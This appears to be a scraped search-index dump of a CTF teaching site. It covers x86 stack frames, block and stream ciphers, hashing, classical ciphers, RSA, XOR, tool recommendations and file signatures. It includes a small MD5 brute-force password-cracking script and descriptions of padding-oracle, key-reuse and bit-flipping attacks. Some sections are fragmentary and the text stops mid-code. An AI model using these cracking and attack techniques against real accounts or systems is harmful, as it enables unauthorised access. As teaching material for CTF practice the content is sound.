contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp
rather than an offset to esp
. A stack frame is essentially just the space used on the stack by a given function.
The stack is primarily used for a few things:
Let's see what the stack looks like right after say_hi
has been called in this 32-bit x86 C program:
#include <stdio.h>\n\nvoid say_hi(const char * name) {\n printf(\"Hello %s!\\n\", name);\n}\n\nint main(int argc, char ** argv) {\n char * name;\n if (argc != 2) {\n return 1;\n }\n name = argv[1];\n say_hi(name);\n return 0;\n}\n
And the relevant assembly:
0804840b <say_hi>:\n 804840b: 55 push ebp\n 804840c: 89 e5 mov ebp,esp\n 804840e: 83 ec 08 sub esp,0x8\n 8048411: 83 ec 08 sub esp,0x8\n 8048414: ff 75 08 push DWORD PTR [ebp+0x8]\n 8048417: 68 f0 84 04 08 push 0x80484f0\n 804841c: e8 bf fe ff ff call 80482e0 <printf@plt>\n 8048421: 83 c4 10 add esp,0x10\n 8048424: 90 nop\n 8048425: c9 leave\n 8048426: c3 ret\n\n08048427 <main>:\n 8048427: 8d 4c 24 04 lea ecx,[esp+0x4]\n 804842b: 83 e4 f0 and esp,0xfffffff0\n 804842e: ff 71 fc push DWORD PTR [ecx-0x4]\n 8048431: 55 push ebp\n 8048432: 89 e5 mov ebp,esp\n 8048434: 51 push ecx\n 8048435: 83 ec 14 sub esp,0x14\n 8048438: 89 c8 mov eax,ecx\n 804843a: 83 38 02 cmp DWORD PTR [eax],0x2\n 804843d: 74 07 je 8048446 <main+0x1f>\n 804843f: b8 01 00 00 00 mov eax,0x1\n 8048444: eb 1c jmp 8048462 <main+0x3b>\n 8048446: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 8048449: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 804844c: 89 45 f4 mov DWORD PTR [ebp-0xc],eax\n 804844f: 83 ec 0c sub esp,0xc\n 8048452: ff 75 f4 push DWORD PTR [ebp-0xc]\n 8048455: e8 b1 ff ff ff call 804840b <say_hi>\n 804845a: 83 c4 10 add esp,0x10\n 804845d: b8 00 00 00 00 mov eax,0x0\n 8048462: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]\n 8048465: c9 leave\n 8048466: 8d 61 fc lea esp,[ecx-0x4]\n 8048469: c3 ret\n
Skipping over the bulk of main
, you'll see that at 0x8048452
main
's name
local is pushed to the stack because it's the first argument to say_hi
. Then, a call
instruction is executed. call
instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi
at 0x0804840b
, the stack looks like this:
EIP = 0x0804840b (push ebp)\nESP = 0xffff0000\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
The first thing say_hi
does is save the current ebp
so that when it returns, ebp
is back where main
expects it to be. The stack now looks like this:
EIP = 0x0804840c (mov ebp, esp)\nESP = 0xfffefffc\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Again, note how esp
gets smaller when values are pushed to the stack.
Next, the current esp
is saved into ebp
, marking the top of the new stack frame.
EIP = 0x0804840e (sub esp, 0x8)\nESP = 0xfffefffc\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP, EBP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Then, the stack is \"grown\" to accommodate local variables inside say_hi
.
EIP = 0x08048414 (push [ebp + 0x8])\nESP = 0xfffeffec\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\nESP -> 0xfffeffec: UNDEFINED\n
NOTE: stack space is not implicitly cleared!
Now, the 2 arguments to printf
are pushed in reverse order.
EIP = 0x0804841c (call printf@plt)\nESP = 0xfffeffe4\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\nESP -> 0xfffeffe4: 0x080484f0 // printf argument 1\n
Finally, printf
is called, which pushes the address of the next instruction to execute.
EIP = 0x080482e0\nESP = 0xfffeffe0\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\n 0xfffeffe4: 0x080484f0 // printf argument 1\nESP -> 0xfffeffe0: 0x08048421 // Return address for printf\n
Once printf
has returned, the leave
instruction moves ebp
into esp
, and pops the saved EBP.
EIP = 0x08048426 (ret)\nESP = 0xffff0000\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
And finally, ret
pops the saved instruction pointer into eip
which causes the program to return to main with the same esp
, ebp
, and stack contents as when say_hi
was initially called.
EIP = 0x0804845a (add esp, 0x10)\nESP = 0xffff0004\nEBP = 0xffff002c\n\nESP -> 0xffff0004: 0xffffa0a0 // say_hi argument 1\n
"}, {"location": "cryptography/overview/", "title": "Overview", "text": ""}, {"location": "cryptography/overview/#cryptography", "title": "Cryptography", "text": "Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes which are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.
The word \u201ccryptography\u201d technically means the art of writing codes. When it comes to digital forensics, it\u2019s a method you can use to understand how data is constructed for your analysis.
"}, {"location": "cryptography/overview/#what-is-cryptography-used-for", "title": "What is cryptography used for?", "text": "Uses in every day software
Malicious uses
A Block Cipher is an algorithm which is used in conjunction with a cryptosystem in order to package a message into evenly distributed 'blocks' which are encrypted one at a time.
"}, {"location": "cryptography/what-are-block-ciphers/#definitions", "title": "Definitions", "text": "Note
In this case ~i~ represents an index over the # of blocks in the plaintext. F() and g() represent the function used to convert plaintext into ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#electronic-codebook-ecb", "title": "Electronic Codebook (ECB)", "text": "ECB is the most basic block cipher, it simply chunks up plaintext into blocks and independently encrypts those blocks and chains them all into a ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#flaws", "title": "Flaws", "text": "
Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the ECB Penguin image below.
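The pattern leak is easy to reproduce. The sketch below does not use a real block cipher: toy_encrypt_block is a hypothetical stand-in built from a keyed SHA-256 hash, which is deterministic like a block cipher but cannot be decrypted. It is only meant to show that equal plaintext blocks produce equal ciphertext blocks under ECB.

```python
import hashlib

BLOCK_SIZE = 16

def toy_encrypt_block(key, block):
    # Stand-in for a real block cipher such as AES: deterministic and keyed,
    # but NOT decryptable. It is only here to show the ECB pattern leak.
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]

def ecb_encrypt(key, plaintext):
    # Split into fixed-size blocks and encrypt each one independently.
    blocks = [plaintext[i:i + BLOCK_SIZE] for i in range(0, len(plaintext), BLOCK_SIZE)]
    return [toy_encrypt_block(key, block) for block in blocks]

key = b'an example key'
plaintext = b'A' * 16 + b'B' * 16 + b'A' * 16
ciphertext_blocks = ecb_encrypt(key, plaintext)
for block in ciphertext_blocks:
    print(block.hex())
```

The first and third lines of output are identical, so an observer learns that those two plaintext blocks were the same without knowing the key.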
Original Image ECB Image Other Block Cipher Modes"}, {"location": "cryptography/what-are-block-ciphers/#cipher-block-chaining-cbc", "title": "Cipher Block Chaining (CBC)", "text": "CBC is an improvement upon ECB where an Initialization Vector is used in order to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of
Note
Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#propogating-cipher-block-chaining-pcbc", "title": "Propogating Cipher Block Chaining (PCBC)", "text": "PCBC is a less used cipher which modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process \"propogate\" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.
"}, {"location": "cryptography/what-are-block-ciphers/#counter-ctr", "title": "Counter (CTR)", "text": "
Note
Counter is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)
CTR mode makes the block cipher similar to a stream cipher. For each block, a counter is combined with a nonce and encrypted under the key, and the result is XORed with the plaintext to produce the ciphertext. Decryption is the exact same process, except the ciphertext is XORed instead of the plaintext. This means that the process is parallelizable for both encryption and decryption, and you can begin from anywhere, as the counter for any block can be deduced easily.
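A minimal sketch of the idea follows. It is not real CTR mode with AES: keystream_block is a hypothetical stand-in that hashes the key, nonce, and counter with SHA-256 instead of running a block cipher, and the key and nonce values are arbitrary. The structure is the same, though: one keystream block per counter value, XORed with the data.

```python
import hashlib

BLOCK_SIZE = 16

def keystream_block(key, nonce, counter):
    # Stand-in for encrypting (nonce followed by counter) with a real block cipher.
    counter_bytes = counter.to_bytes(8, 'big')
    return hashlib.sha256(key + nonce + counter_bytes).digest()[:BLOCK_SIZE]

def ctr_xor(key, nonce, data):
    # The same function encrypts and decrypts, because XOR undoes itself.
    out = bytearray()
    for offset in range(0, len(data), BLOCK_SIZE):
        block = data[offset:offset + BLOCK_SIZE]
        stream = keystream_block(key, nonce, offset // BLOCK_SIZE)
        out.extend(b ^ s for b, s in zip(block, stream))
    return bytes(out)

key = b'an example key'
nonce = b'8bytenon'
message = b'counter mode turns a block cipher into a stream cipher'
ciphertext = ctr_xor(key, nonce, message)
print(ctr_xor(key, nonce, ciphertext))
```

Each block only needs its own counter value, so blocks can be processed in any order or in parallel.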
"}, {"location": "cryptography/what-are-block-ciphers/#security-considerations", "title": "Security Considerations", "text": "
If the nonce chosen is non-random, it is important to concatenate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter), as adding or XORing the nonce with the counter would break security: an attacker can cause a collision between nonce and counter values. An attacker who can provide a plaintext, nonce, and counter can then decrypt a block by using the ciphertext, as seen in the decryption image.
"}, {"location": "cryptography/what-are-block-ciphers/#padding-oracle-attack", "title": "Padding Oracle Attack", "text": "A Padding Oracle Attack sounds complex, but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#requirements", "title": "Requirements", "text": "Hashing functions are one way functions which theoretically provide a unique output for every input. MD5, SHA-1, and other hashes which were considered secure are now found to have collisions or two different pieces of data which produce the same supposed unique output.
"}, {"location": "cryptography/what-are-hashing-functions/#string-hashing", "title": "String Hashing", "text": "A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn\u2019t). For example, the hash for \u201cdog\u201d should be different from other hashes.
You can use command line tools or online resources such as this one. Example:
$ echo -n password | md5
5f4dcc3b5aa765d61d8327deb882cf99
Here, \u201cpassword\u201d is hashed with different hashing algorithms:
Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
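The same hashes can be computed with the hashlib module in Python's standard library. This is a small sketch; the choice of the three algorithms is just an example.

```python
import hashlib

data = b'password'

# Hash the same input with several algorithms and collect the hex digests.
digests = {name: hashlib.new(name, data).hexdigest() for name in ('md5', 'sha1', 'sha256')}

for name, digest in digests.items():
    print(name, digest)
```

The md5 line matches the command line example above, and the longer digests show how output size differs between algorithms.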
"}, {"location": "cryptography/what-are-hashing-functions/#file-hashing", "title": "File Hashing", "text": "A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.
What is it used for?
- File and data identification
- Password/certificate storage comparison
How can we determine the hash of a file? You can use the md5sum command (or similar).
$ md5sum samplefile.txt\n3b85ec9ab2984b91070128be6aae25eb samplefile.txt\n
"}, {"location": "cryptography/what-are-hashing-functions/#hash-collisions", "title": "Hash Collisions", "text": "A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.
What\u2019s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer, since it\u2019s hard to get the passwords from hashes.
If you bruteforce by trying every possible piece of text or data, eventually you\u2019ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
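A brute-force search of this kind can be sketched in a few lines. The example assumes an unsalted MD5 hash of a very short lowercase password, which is far weaker than real password storage should be. crack_md5 is a hypothetical helper name.

```python
import hashlib
import itertools
import string

def crack_md5(target_hex, max_length=4):
    # Try every lowercase string up to max_length until one hashes to the target.
    for length in range(1, max_length + 1):
        for letters in itertools.product(string.ascii_lowercase, repeat=length):
            candidate = ''.join(letters)
            if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
                return candidate
    return None

stored_hash = hashlib.md5(b'dog').hexdigest()   # what the computer would have stored
found = crack_md5(stored_hash)
print(found)
```

The search space grows by a factor of 26 with every extra character, which is why longer passwords and slower hash functions make this approach impractical.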
Two different files on the same hard drive with the same cryptographic hash can be very interesting.
\u201cIt\u2019s now well-known that the cryptographic hash function MD5 has been broken,\u201d said Peter Selinger of Dalhousie University. \u201cIn March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.\u201d
For example, he cited this famous pair:
and
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.
Selinger said that \u201cthe algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.\u201d
Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl\u2019s Illustrated Guide. And here\u2019s a good article from DFI News that explores the same topic.
"}, {"location": "cryptography/what-are-stream-ciphers/", "title": "Stream Ciphers", "text": "A Stream Cipher is used for symmetric key cryptography, or when the same key is used to encrypt and decrypt data. Stream Ciphers encrypt pseudorandom sequences with bits of plaintext in order to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.
"}, {"location": "cryptography/what-are-stream-ciphers/#definitions", "title": "Definitions", "text": "A one time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers in order to generate a random ciphertext. The advantage of the one time pad is that it offers an immense amount of security BUT in order for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one time pads have little use in modern day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128 bit in length, in order to seed a pseudorandom keystream which is used to encrypt the text.
"}, {"location": "cryptography/what-are-stream-ciphers/#types-of-stream-ciphers", "title": "Types of Stream Ciphers", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#synchronous-stream-ciphers", "title": "Synchronous Stream Ciphers", "text": "A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher which XOR's the bits with the bits of the plaintext. Encryption and decryption require that the synchronus state cipher be in the same state, otherwise the message cannot be decrypted.
"}, {"location": "cryptography/what-are-stream-ciphers/#self-synchronizing-stream-ciphers", "title": "Self-synchronizing Stream Ciphers", "text": "A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher which uses the previous N digits in order to compute the keystream used for the next N characters.
Note
Seems a lot like block ciphers, doesn't it? That's because the cipher feedback (CFB) mode of a block cipher is an example of a self-synchronizing stream cipher.
"}, {"location": "cryptography/what-are-stream-ciphers/#stream-cipher-vulnerabilities", "title": "Stream Cipher Vulnerabilities", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#key-reuse", "title": "Key Reuse", "text": "The key tenet of using stream ciphers securely is to NEVER repeat key use because of the communative property of XOR. If C~1~ and C~2~ have been XOR'd with a key K, retrieving that key K is trivial because C~1~ XOR C~2~ = P~1~ XOR P~2~ and having an english language based XOR means that cryptoanalysis tools such as a character frequency analysis will work well due to the low entropy of the english language.
"}, {"location": "cryptography/what-are-stream-ciphers/#bit-flipping-attack", "title": "Bit-flipping Attack", "text": "Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit in order for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronus stream cipher.
"}, {"location": "cryptography/what-is-a-substitution-cipher/", "title": "Substitution Cipher", "text": "A Substitution Cipher is system of encryption where different symobls substitute a normal alphabet.
"}, {"location": "cryptography/what-is-a-vigenere-cipher/", "title": "Vigenere Cipher", "text": "A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar shifted alphabets.
The following table can be used to encode a message:
"}, {"location": "cryptography/what-is-a-vigenere-cipher/#encryption", "title": "Encryption", "text": "For example, encrypting the text SUPERSECRET
with CODE
would follow this process:
CODE
gets padded to the length of SUPERSECRET
so the key becomes CODECODECOD
SUPERSECRET
we use the table to get the Alphabet to use, in this instance row C
and column S
U
UISITGHGTSW
C
U
S
SUPERSECRET
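The SUPERSECRET and CODE example can be reproduced with a short Python sketch. It assumes uppercase A-Z input only and replaces the lookup table with the equivalent modular addition of letter positions; the function name is ours, not part of any library.

```python
from itertools import cycle
import string

ALPHABET = string.ascii_uppercase

def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    # Shift each letter by the position of the matching key letter,
    # repeating the key to the length of the text.
    sign = -1 if decrypt else 1
    out = []
    for ch, k in zip(text, cycle(key)):
        shift = sign * ALPHABET.index(k)
        out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
    return ''.join(out)

ciphertext = vigenere('SUPERSECRET', 'CODE')
print(ciphertext)
print(vigenere(ciphertext, 'CODE', decrypt=True))
```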
The Caesar Cipher or Caesar Shift is a cipher which uses the alphabet in order to encode texts.
CAESAR
encoded with a shift of 8 is KIMAIZ
so ABCDEFGHIJKLMNOPQRSTUVWXYZ
becomes IJKLMNOPQRSTUVWXYZABCDEFGH
ROT13 is the same thing but with a fixed shift of 13. The Caesar Cipher is trivial to bruteforce because there are only 25 possible shifts.
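A minimal Python sketch of the shift and of the bruteforce, assuming uppercase A-Z text (other characters pass through unchanged). The helper name is ours.

```python
import string

ALPHABET = string.ascii_uppercase

def caesar(text: str, shift: int) -> str:
    # Build the shifted alphabet and map every letter onto it
    shift %= 26
    shifted = ALPHABET[shift:] + ALPHABET[:shift]
    return text.translate(str.maketrans(ALPHABET, shifted))

print(caesar('CAESAR', 8))
print(caesar(ALPHABET, 8))

# Bruteforce: undo each of the 25 possible shifts and read the candidates
for shift in range(1, 26):
    print(shift, caesar('KIMAIZ', -shift))
```

ROT13 is simply caesar(text, 13), and applying it twice returns the original text.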
"}, {"location": "cryptography/what-is-rsa/", "title": "RSA", "text": "RSA, which is an abbreviation of the author's names (Rivest\u2013Shamir\u2013Adleman), is a cryptosystem which allows for asymmetric encryption. Asymmetric cryptosystems are alos commonly referred to as Public Key Cryptography where a public key is used to encrypt data and only a secret, private key can be used to decrypt the data.
"}, {"location": "cryptography/what-is-rsa/#definitions", "title": "Definitions", "text": "If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:
(m^e^)^d^ \u2261 m (mod n)
Note
The triple equals sign refers to modular congruence, which in this case means that there exists an integer k such that (m^e^)^d^ = kn + m.
RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.
"}, {"location": "cryptography/what-is-rsa/#implementation", "title": "Implementation", "text": "RSA follows 4 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption
"}, {"location": "cryptography/what-is-rsa/#key-generation", "title": "Key Generation", "text": "We are going to follow along Wikipedia's small numbers example in order to make this idea a bit easier to understand.
Note
In this example we are using Carmichael's totient function where \u03bb(n) = lcm(\u03bb(p), \u03bb(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is \u03c6(n) = (p \u2212 1)(q \u2212 1)
Calculate \u03bb(n) = lcm(p-1, q-1)
Choose a public exponent e such that 1 < e < \u03bb(n) and e is coprime to \u03bb(n) (they share no common factor other than 1). The standard in most cases is 65537, but we will be using e = 17.
Now we have a public key of (3233, 17) and a private key of (3233, 413)
"}, {"location": "cryptography/what-is-rsa/#encryption", "title": "Encryption", "text": "With the public key, m can be encrypted trivially
The ciphertext is equal to m^e^ mod n or:
c = m^17^ mod 3233
"}, {"location": "cryptography/what-is-rsa/#decryption", "title": "Decryption", "text": "With the private key, m can be decrypted trivially as well
The plaintext is equal to c^d^ mod n or:
m = c^413^ mod 3233
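The small numbers example can be checked with a few lines of Python. This is a sketch, not a secure implementation: the primes p = 61 and q = 53 are taken from Wikipedia's small numbers example (they give the n = 3233 used above), the message 65 is an arbitrary choice, and real RSA uses far larger primes together with a padding scheme.

```python
from math import gcd

# Primes from Wikipedia's small numbers example (an assumption here; n matches the text)
p, q = 61, 53
n = p * q

# Carmichael's totient: lcm(p - 1, q - 1)
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)

# Public exponent, which must be coprime to the totient
e = 17
assert gcd(e, lam) == 1

# Private exponent: the modular inverse of e (three-argument pow, Python 3.8+)
d = pow(e, -1, lam)

m = 65                     # arbitrary message with 0 < m < n
c = pow(m, e, n)           # encryption: m^e mod n
recovered = pow(c, d, n)   # decryption: c^d mod n
print(n, lam, d, c, recovered)
```

Three-argument pow performs modular exponentiation directly, so the huge intermediate powers never have to be computed in full.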
"}, {"location": "cryptography/what-is-rsa/#exploitation", "title": "Exploitation", "text": "From the RsaCtfTool README
Attacks:
Data can be represented in different bases. For a computer to work with a character such as 'A', it must first be given a numerical representation in Base 2, or binary.
"}, {"location": "cryptography/what-is-xor/#xor-basics", "title": "XOR Basics", "text": "An XOR or eXclusive OR is a bitwise operation indicated by ^
and shown by the following truth table:
So XOR'ing the bytes 0xA0 ^ 0x2C
translates to:
0b10001100
which is equivalent to 0x8C
. A cool property of XOR is that it is reversible, meaning 0x8C ^ 0x2C = 0xA0
and 0x8C ^ 0xA0 = 0x2C
XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:
>>> data = 'CAPTURETHEFLAG'\n>>> key = 'A'\n>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])\n>>> encrypted\n'\\x02\\x00\\x11\\x15\\x14\\x13\\x04\\x15\\t\\x04\\x07\\r\\x00\\x06'\n>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])\n>>> decrypted\n'CAPTURETHEFLAG'\n
This can be extended using a multibyte key by iterating in parallel with the data.
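A minimal sketch of the multibyte case, working on bytes rather than strings. The key b'KEY' is an arbitrary illustration value and the function name is ours.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # Pair every data byte with a key byte, repeating the key as needed
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b'CAPTURETHEFLAG'
key = b'KEY'
ciphertext = xor_bytes(plaintext, key)
print(ciphertext.hex())

# Applying the same key again reverses the operation
recovered = xor_bytes(ciphertext, key)
print(recovered)
```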
"}, {"location": "cryptography/what-is-xor/#exploiting-xor-encryption", "title": "Exploiting XOR Encryption", "text": ""}, {"location": "cryptography/what-is-xor/#single-byte-xor-encryption", "title": "Single Byte XOR Encryption", "text": "Single Byte XOR Encryption is trivial to bruteforce as there are only 255 key combinations to try.
"}, {"location": "cryptography/what-is-xor/#multibyte-xor-encryption", "title": "Multibyte XOR Encryption", "text": "Multibyte XOR gets exponentially harder the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the cipher text into groups based on the number of characters in the key. These groups then are bruteforced using the idea that some letters appear more frequently in the english alphabet than others.
"}, {"location": "faq/connecting-to-services/", "title": "How to connect to services", "text": "Note
While service challenges are often connected to with netcat or PuTTY, solving them will sometimes require using a scripting language like Python. CTF players often use Python alongside pwntools.
You can run pwntools right in your browser by using repl.it.
"}, {"location": "faq/connecting-to-services/#using-netcat", "title": "Using netcat", "text": "netcat
is a networking utility found on macOS and Linux operating systems that allows for easy connections to CTF challenges. Service challenges will commonly give you an address and a port to connect to. The syntax for connecting to a service challenge with netcat is nc <ip> <port>
.
Windows users can connect to service challenges using ConEmu, which can be downloaded here. Connecting to service challenges with ConEmu is done by running nc <ip> <port>
.
Occasionally, certain kinds of exploits will require a server to connect back to. Some examples are connect back shellcode, cross site request forgery (CSRF), or blind cross site scripting (XSS).
"}, {"location": "faq/i-need-a-server/#i-just-a-web-server", "title": "I just a web server", "text": "If you just need a web server to host simple static websites or check access logs, we recommend using PythonAnywhere to host a simple web application. You can program a simple web application in popular Python web frameworks (e.g. Flask) and host it there for free.
"}, {"location": "faq/i-need-a-server/#i-need-a-real-server", "title": "I need a real server", "text": "If you need a real server (perhaps to run complex calculations or for shellcode to connect back to), we recommend DigitalOcean. DigitalOcean has a cheap $4-6/month plan for a small server that can be freely configured to do whatever you need.
"}, {"location": "faq/recommended-software/", "title": "Recommended Software", "text": "Generally in cyber security competitions, it is up to you and your team to determine what software to use. In some cases you may even end up creating new tools to give you an edge! That being said, here are some applications that we recommend for most competitors for most competitions.
"}, {"location": "faq/recommended-software/#disassemblersdecompilers", "title": "Disassemblers/Decompilers", "text": "Ghidra
Ghidra is a disassembler and decompiler that is open source and free to use. Released by the NSA, Ghidra is a capable tool and is the recommended disassembler for most use cases. An alternative is IDA Pro (a cyber security industry standard), however IDA Pro is not free and licenses are very expensive.
Binary Ninja
Binary Ninja is a commercial disassembler (with a free demo application) that provides an aesthetic and easy to use interface for binary reverse engineering. It also has a Web-UI which can be used freely. Binary Ninja's API and intermediate language make it superior to other disassemblers for certain use cases.
Pwndbg for GDB
Pwndbg is a plugin for the GNU Debugger (gdb) which makes it easier to dynamically reverse an application by stepping through its execution. In order to use pwndbg you will first need to have gdb installed via a Linux virtual machine or similar.
WinDbg
WinDbg is a debugger for Windows applications.
Burp Suite
Burp Suite is an HTTP proxy and set of tools which allow you to view, edit and replay your HTTP requests. While Burp Suite is a commercial tool, it offers a free version which is very capable and usually all that's needed.
sqlmap
sqlmap is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It's open source and freely available.
Google Chrome
Google Chrome is a web browser with a suite of developer tools and extensions. These tools and extensions can be useful when investigating a web application.
Wireshark
Wireshark is a PCAP analysis tool which allows you to analyze and record network traffic.
VMware
VMware is a company that creates virtualization software that allows you to run other operating systems within your existing operating system. While their products are not generally free, their software is best in class for virtualization.
VMware Fusion, VMware Workstation, and VMware Player are three of their virtualization products that can be used on your computer to run other OS'es. VMware Player is free to use for Windows and Linux.
VirtualBox
VirtualBox is open source virtualization software which allows you to virtualize other operating systems. It's very similar to VMware products but free for all OS'es. It is generally slower than VMware but works well enough for most people.
Python
Python is an easy-to-learn, widely used programming language which supports complex applications as well as small scripts. It has a large community which provides thousands of useful packages. Python is widely used in the cyber security industry and is generally the recommended language to use in CTF competitions.
pwntools
Pwntools is a Python package which makes interacting with processes and networks easy. It is a recommended library for interacting with binary exploitation and networking based CTF challenges.
Note
You can run pwntools right in your browser by using repl.it. Create a new Python repl and install the pwntools
package. After that you'll be able to use pwntools directly from your browser without having to install anything.
CyberChef
CyberChef is a simple web app for analysing and decoding data without having to deal with complex tools or programming languages.
Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data which is seemingly deleted, not stored, or worse, covertly recorded.
An important part of forensics is having the right tools, as well as being familiar with the following topics:
File Extensions are not the sole way to identify the type of a file. Files have certain leading bytes called file signatures which allow programs to parse the data in a consistent manner. Files can also contain additional \"hidden\" data called metadata which can be useful in finding out information about the context of a file's data.
"}, {"location": "forensics/what-are-file-formats/#file-signatures", "title": "File Signatures", "text": "File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally they\u2019re 2-4 bytes long, found at the beginning of a file.
"}, {"location": "forensics/what-are-file-formats/#what-is-it-used-for", "title": "What is it used for?", "text": "Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type in order to open it properly.
"}, {"location": "forensics/what-are-file-formats/#how-do-you-find-the-file-signature", "title": "How do you find the file signature?", "text": "You need to be able to look at the binary data that constitutes the file you\u2019re examining. To do this, you\u2019ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler\u2019s.
"}, {"location": "forensics/what-are-file-formats/#example", "title": "Example", "text": "The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600
or in ASCII \u02c7\u00ff\u02c7\u2021 JFIF
where \\x00
and \\x10
lack symbols.
Searching in Gary Kessler\u2019s database shows that this file signature belongs to a JPEG/JFIF graphics file
, exactly what we suspect.
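The same check can be scripted. The sketch below compares the leading bytes from the example against a handful of well-known signatures; the table is a small illustrative subset that we chose, not a copy of Gary Kessler's database.

```python
# A few well-known signatures; a real lookup table would be much larger
SIGNATURES = {
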